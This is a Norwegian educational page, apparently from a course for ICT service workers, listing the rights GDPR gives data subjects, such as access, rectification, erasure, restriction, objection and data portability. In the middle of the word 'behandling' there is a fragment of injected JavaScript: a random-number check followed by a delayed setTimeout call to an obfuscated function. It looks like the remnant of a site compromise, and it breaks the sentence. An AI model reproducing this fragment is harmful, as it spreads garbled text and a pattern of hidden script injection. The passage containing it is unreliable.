4.4.3 Den registrertes rettigheter

 GDPR gir den registrerte mange rettigheter i forhold til hvordan personopplysningen kan registreres og benyttes.
Det er viktig at du som IKT-servicemedarbeider er klar over de viktigste rettighetene loven gir.
Ved innsamling og behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andling av personopplysninger har den registrerte blant annet følgende rettigheter:

  • Rett til innsyn
  • Rett til å få opplysningene rettet
  • Rett til å få opplysningene slettet
  • Rett til å få opplysningene begrenset
  • Rett til å få protestere
  • Rettigheter ved automatiske avgjørelser
  • Rett til dataportabilitet
  • Rett til informasjon


Datatilsynet om den registrertes rettigheter


Klikk her for neste post 4.4.4 Personvern på arbeidsplassen